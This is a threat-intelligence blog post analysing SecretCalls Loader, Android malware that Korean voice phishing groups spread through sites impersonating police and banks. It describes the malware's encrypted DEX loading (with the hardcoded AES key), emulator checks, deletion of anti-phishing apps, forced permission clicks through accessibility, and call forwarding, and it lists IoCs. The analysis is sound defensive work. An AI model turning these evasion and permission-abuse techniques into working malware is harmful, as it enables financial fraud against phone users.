Open in app

Sign in

Write

Sign in

SecretCalls Spotlight: A Formidable App of Notorious Korean Financial Fraudster (Part 1)

S2W
S2W BLOG
Published in
8 min readApr 30, 2024

--

Author: S2W TALON

Last modified: Apr 30, 2024

Photo by Alexander Andrews on Unsplash

You can also read more about the Voice Phishing Group in the announcement we made at Black hat asia 24https://www.blackhat.com/asia-24/briefings/schedule/index.html#voice-phishing-syndicates-unmasked-an-in-depth-investigation-and-exposure-37941

Executive Summary

  • Voice phishing groups are building phishing pages, developing malicious Android apps to trick victims into accessing phishing sites, and installing the apps for financial fraud to steal money from victims.
  • We named a family of voice phishing apps distributed in South Korea that impersonate law enforcement agencies, financial institutions, etc. SecretCalls Loader / SecretCalls, the threat group that uses this malware for voice phishing attacks, is known as SecretCrow.
  • SecretCalls Loader performs techniques such as emulator detection, class/function name obfuscation, DEX encryption, DEX dynamic loading, and triggering a second-stage installation (SecretCalls) to disrupt analysis.
  • SecretCalls will be analyzed in two parts, with “Part 1” analyzing the phishing site, distribution method, and SecretCalls Loader app, and “Part 2” analyzing the functionality of SecretCalls, including the actual malicious behavior.

Introduction

The damage caused by voice phishing in Korea has been 1.8 trillion KRW in the last five years, and the cumulative amount is expected to reach 4 trillion KRW by 2022. According to the National Police Agency, the average age of voice phishing victims over the past five years has been in their 50s. While the proportion of victims in their 20s was relatively small in 2018, it gradually increased and ranked the highest among victims in 2022.

Figure 1. Age of Voice Phishing Victims over the Last 5 Years
(Source: National Police Agency)

Voice phishing groups operating in South Korea use a variety of tactics to trick large numbers of victims. They use systematic procedures such as operating phishing sites, distributing malicious apps, and collecting victim‘s personal information to persuade them to install the apps or transfer money. According to the Financial Supervisory Service, voice phishing groups trick them into accessing phishing sites by calling victims directly and instructing them to install the app.

Figure 2. Excerpt of a voicemail call from a victim.
(Source: Financial Supervisory Service YouTube)

If the victim downloads and installs the malicious app from the phishing site, the attacker can remotely control the device. In August last year, when installing a remote control app distributed through smishing impersonating a delivery service, the malicious app stole the ID card stored in the device, and a new OTP was issued, resulting in financial fraud worth about 400 million won.

In addition, voice phishing can force a call to the attacker or force a call from the attacker to be answered, known as a “call-forwarding” feature, allowing to cancel the outgoing call and call another member of a voice phishing group, even if the victim is calling a legitimate financial institution or law enforcement agency. When the victim calls the attacker, his or her phone still displays the normal phone number of the institutions that he or she entered due to the manipulated call screen. As a result, a victim infected with a voice phishing app may think they are speaking to a legitimate employee of an institution and fall victim to financial fraud.

The attack cycle of voice phishing groups is shown below.

  1. The attacker selects a victim and makes a call to install an app
  2. The victim accesses a phishing site provided by the attacker and installs the malicious app
  3. After installing the app, the victim calls a legitimate institution to verify the facts of being involved in financial fraud
  4. The call is canceled by the apps and forwarded to the attacker, which can result in financial fraud.
Figure 3. Example voice phishing attack tactic

Phishing Site

SecretCalls is one of the types of malicious apps used by voice-phishing groups. It is distributed through phishing sites posing as law enforcement agencies or financial institutions. The phishing site uses themes such as the “National Police Agency Cybercop” and “Phishing Eyes” registered on the Google Play Store. Clicking the “Install” button on the site downloads the malicious APK file, which has a name with the pattern of [A-Za-z0–9]{5}.apk.

Figure 4. Example of SecretCalls phishing page

SecretCalls have historically been distributed by impersonating law enforcement agencies, such as the “National Police Agency” and the “General Prosecutor’s Office,” as well as financial companies, and disguised as various themes, such as anti-voice phishing apps, video players, shopping malls, and more.

Figure 5. Themes used when disseminating SecretCalls

Detailed Analysis of SecretCalls Loader

The SecretCalls Loader downloaded from the phishing site acts as a dropper and loader to install the SecretCalls. SecretCalls exist internally in an encrypted form in the resource path and use “secret-classes.dex” as the obfuscated DEX file name. In April 2023, the internal filename was changed to “kill-classes.dex” and started to circulate, but except for the filename, the distribution method and key features are the same as before.

Sample information

  • Filename: byfg2.apk
  • App name: Sacn Check
  • Package name: com.onaBDx.iGFKde
  • MD5: 2603b73c22498e6eb20c4cfae5d34850
  • SHA-1: 121b6fd9178edfd3b6422c66c3d504bee90cbe46
  • SHA-256: 76bb1d3fa9b8b872c01da30bfac5fe52ae89d3ca43ce0dad967bc7da0a8e7644
  • Cert(SHA-1): e24292b5d840671519b87cb076f9ced4f39191c5

1. Load Native Library

SecretCalls Loader uses a native library for emulator detection and dex file decryption.

Figure 6. Loading the Native Library

2. Decrypt kill-classes.dex

The SecretCalls Loader exploits the context initialization process to dynamically decrypt and load DEX files. In the app’s internal files, you can see that in addition to the “classes.dex” file, there is a “kill-classes.dex” file. These DEX files are encrypted with AES and decrypted and dynamically loaded as the app runs.

Figure 7. SecretCalls Loader File Structure

The decrypt() function implemented in the native library decrypts the encrypted “kill-classes.dex” file in the APK. The encryption key is hardcoded in the library, and the DEX file is decrypted in AES-128/ECB mode.

  • Decryption key: “dbcdcfghijklmaop”
Figure 8. DEX Decryption

3. Dex dynamic loading

Android apps perform context initialization before the main activity is called. If you specify a path of a class in the AndroidManifest.xml file in the “android:label” field of the <application> entry, a context initialization function(attachBaseContext) that overrides ContextWrapper is called inside. The APK can load any necessary resources or data during this process before the main behavior runs.

Figure 9. Context Initialization — attachBaseContext()

The aforementioned library calls and DEX decryption are all done during context initialization. Once both processes have occurred, the decrypted DEX file is loaded dynamically.

Figure 10. Part of the DEX dynamic loading process — JAVA Reflection

4–1. Emulator detection

When the decrypted DEX file is executed by the main activity, it checks if the infected device meets the conditions to be infected. If any of the following conditions are not met, execution is aborted.

Table 1. Emulator detection conditions

4–2. Delete the phishing detection app

SecretCalls Loader deletes phishing detection apps if installed on the infected device. There are 4 targeted apps, such as “Whowho”. When the app deletion is completed, the Toast message “Malicious app has been deleted” is displayed. DU Caller is not available for download on the Play Store of the detected apps.

Table 2. List of target apps

4–3. Force acceptance of permissions

Malicious apps trick users into granting accessibility to the app. When the app is launched, it checks whether accessibility is granted or not, and if it is not, it displays a dialog saying, “To use this app, you must allow [Accessibility-Installed Services-Sacn Check] to use normal services” and then terminates the app.
If the user grants accessibility to the voice phishing app in the settings, the app is re-launched by the broadcast receiver to force the user to accept permissions without consent for malicious behavior. Then, for the permissions requested by the app, find and click the button with the string “허용(Allow)” or “항상 허용(Always allow)” in the permission-related activity. In the case of this app, the requested permissions include “Read/Write External Storage” and “Install Unknown Apps”.

Figure 11. Find the Allow Permissions button
Figure 12. Click the button

4–4. Files related to the infection status

During the above process, the execution of malicious actions such as running apps, installing additional apps, deleting apps, and the results of the execution are stored in the infected device in the form of files. When a specific malicious function is called, the contents are written to the file corresponding to the function.

Table 3. Files for recording infection status

4–5. Force Relaunch the App

The broadcast listener registered by the BaseActivity will rerun the BaseActivity if the system dialog is exited (the app is no longer visible on the screen) for any reason other than pressing the home button. This presumably prevents malicious app execution in case the app exits abnormally.

4–6. Install and run SecretCalls

SecretCalls(.APK) performs the actual remote control behavior in the Assets path within the app. The SecretCalls is named “cFuvDW.apk,” which is characterized by the name [A-Za-z]{6}.apk when downloaded and is not further obfuscated/encrypted. SecretCalls is copied by the SecretCalls Loader app named “SecurityService.apk,” the installation is performed using the Install App activity. After the app is successfully installed, SecretCalls is executed by the broadcast listener, and the copied file is deleted.

  • receiver: Lcom/onaBDx/iGFKde/base/BaseActivity;->mPkgReceiver
Figure 13. SecretCalls installation process

Conclusion

  • Voice phishing groups trick users into installing remote control apps for financial fraud; apps are often distributed through phishing sites
  • The remote control app is characterized by including a “call-forwarding” feature that invalidates calls to legitimate institutional phone numbers, and forces calls to the attacker.
  • The SecretCalls Loader uses the Android architecture to apply anti-analysis techniques, including DEX Dynamic Loading, installing additional apps, initializing context, and using Native Libraries.
  • Phishing sites are characterized by being very similar to legitimate sites in disguise. It is difficult to recognize a phishing site with the naked eye, so when downloading an app from a website, it is necessary to verify that the homepage address is legitimate.
  • Be wary of apps downloaded from SMS, websites, messengers, etc., that are not from authorized app markets (Google Playstore, Samsung One Store, etc.)

Appendix A. IoCs

Hashes

  • 9ffc137696947fa52c2a1171ed971d3d
  • c9bd36ec8f1fd4323a3585891c504999
  • 4eece3206d12f32e2061f954bb4eee33
  • ea9bd37b1cf23d95c33356e5dabfb623
  • 2ac75296c3c537faf125543c9d386b05
  • 84695f568bc58df62e9befdcf70c9fe7
  • 963272edf22f2273b5b6b309279d29dd
  • bac5c46f4070ebf7b9ce740e4e0ba1a7
  • f05c85ebbc27ccee496d7940922fc313
  • 2c567713992e320ef4545f6bad48cba1
  • 64d7cdafa0112813b3ee2f18ba0e8b05
  • e8f543d317e9b30c59e4ef9a73577936
  • 59ffa49047dd058c980c0023c4dd7087
  • 16f1bc026c56bf0ec9f89224113ec4f8
  • 984b47a9adbd9879f881af49798f11db
  • 30f608c02e39887399effb74f98ed9bc
  • 5465a99e3652c60df680eaa783263e56
  • 6b67ec8b07939cf58c81ee88cc0ba3ee
  • e40267bb203c87e33692723631183e86
  • b7081e46af122391481235a4d0a542150db1f4500cfce90e07e227730981476f
  • 1d7702548185a610711e25e0f31bdf10719ee38543ec192a129268aafc683b0b
  • 145f72fb0938f395c8d8dc71efa768241a00b7b1721bde4cc231e4233374a836
  • 54ee8358723132b4b6f41eee4c40c3a06a794201ce998d4c7cc6185a37ee0dad
  • f2c48f0a34746fae9dd0bea3eaafc11058338b39736d6a1db715da42437dd601
  • 662b84e31e38334394c35a0862dad21ef10086bd8a90619bc73c4b8598213526
  • e9b7980cde15f62dcceb98470b476b075659ef08b5a38c794b6e8954ccdcefbd
  • 0d619094cd4d2c5fe7ffa917b4cef5852101128a31b25850bb4bdcfeb782b7c0
  • 649176de7d03d218952f72ff780f6f8532752066688192f4ae92e409efaf0864
  • 9b40ee23aa24a37cffe3dba91e4e490e4138ee3f593a135d17f6b2c2e02d69e6
  • 9e8c3d489ad519cc4185d9a69085bc85048f5481743fcc7480d3dde616639771
  • 32e668ab3cbcebaec73d7b8a5b1e5cfee1c8b07969f851df6fe0f1ba405d1a89
  • ce5082cb80719da6e91d4e5fb0b4c35fd4881fb4acbdc06243a00c86b42a4ded
  • d65b2092ee471eb25c756fa4d1847b16895e57aa690c3f317df51afd79d28dd2
  • b46f93c5b127ddbea341c45c42934e32248467f6d226cf8f89c20916491e4977
  • 7f1e4420025c544b9dd8b13929b04c82ac0abd08dba8c2f1e7a667345bf06dee
  • a4c6a52cabfddb57bdaad2532f324116f7900269339d9f41c6d3c46e3bd682ae
  • baad6e7a9a06768682f5553c2b765ac5f74e708be69856d4f640a534a06da459
  • eddf03eb7a3579026eec268e74209f68286bf07993c04ec24ffab10173b69877

Network

  • 61.227.55[.]47
  • 114.44.218[.]84
  • 36.234.40[.]6

Appendix B. Mobile MITRE ATT&CK

Execution

  • (T1575) Native API

Defense Evasion

  • (T1633.001) System Checks
  • (T1630.002) File Deletion
  • (T1407) Download New Code at Runtime
  • (T1629.003) Disable or Modify Tools

--

--

S2W
S2W BLOG

Written by S2W

605 Followers

S2W is specializing in cybersecurity data analysis for cyber threat intelligence.

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams